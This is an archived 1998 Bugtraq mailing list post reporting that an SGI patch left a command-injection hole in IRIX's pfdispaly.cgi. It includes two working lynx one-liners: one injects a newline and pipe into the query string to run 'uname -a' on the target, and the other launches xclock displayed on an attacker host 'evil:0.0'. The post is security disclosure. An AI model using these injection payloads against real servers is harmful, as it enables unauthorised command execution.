Bugtraq mailing list archives
perfomer_tools again
From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Tue, 7 Apr 1998 03:16:01 +0200
Hi There is already a patch from SGI to the pfdispaly.cgi '../..' bug. But it seems it fixes only that problem, without checking the rest of the code for similar vulnerabilities, so even after patch 3018 (04/01/98) you can try: $ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' uname -a\| file IRIX victim 6.2 03131015 IP22 or $ lynx -dump \ http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|' (You probably will notice this exploit is similar to that one on 'wrap'; it's nice to find that sometimes reusing code does work) The fix is easy (for this particular problem); so it's left to the reader. Anyway, if you're using SGI cgi's you should consider limiting the access to your domain... -- J.A. Gutierrez So be easy and free when you're drinking with me I'm a man you don't meet every day finger me for PGP (the pogues)
Current thread:
- Article on writing secure software Trane Francks (Apr 05)
- Re: Article on writing secure software Adam Shostack (Apr 06)
- IE EMBED Fix Aleph One (Apr 06)
- Buffer Overflow Vulnerability in suidperl/sperl program SGI Security Coordinator (Apr 06)
- suid_exec Buffer Overflow SGI Security Coordinator (Apr 06)
- perfomer_tools again J.A. Gutierrez (Apr 06)
- <Possible follow-ups>
- Re: Article on writing secure software Jim Dennis (Apr 07)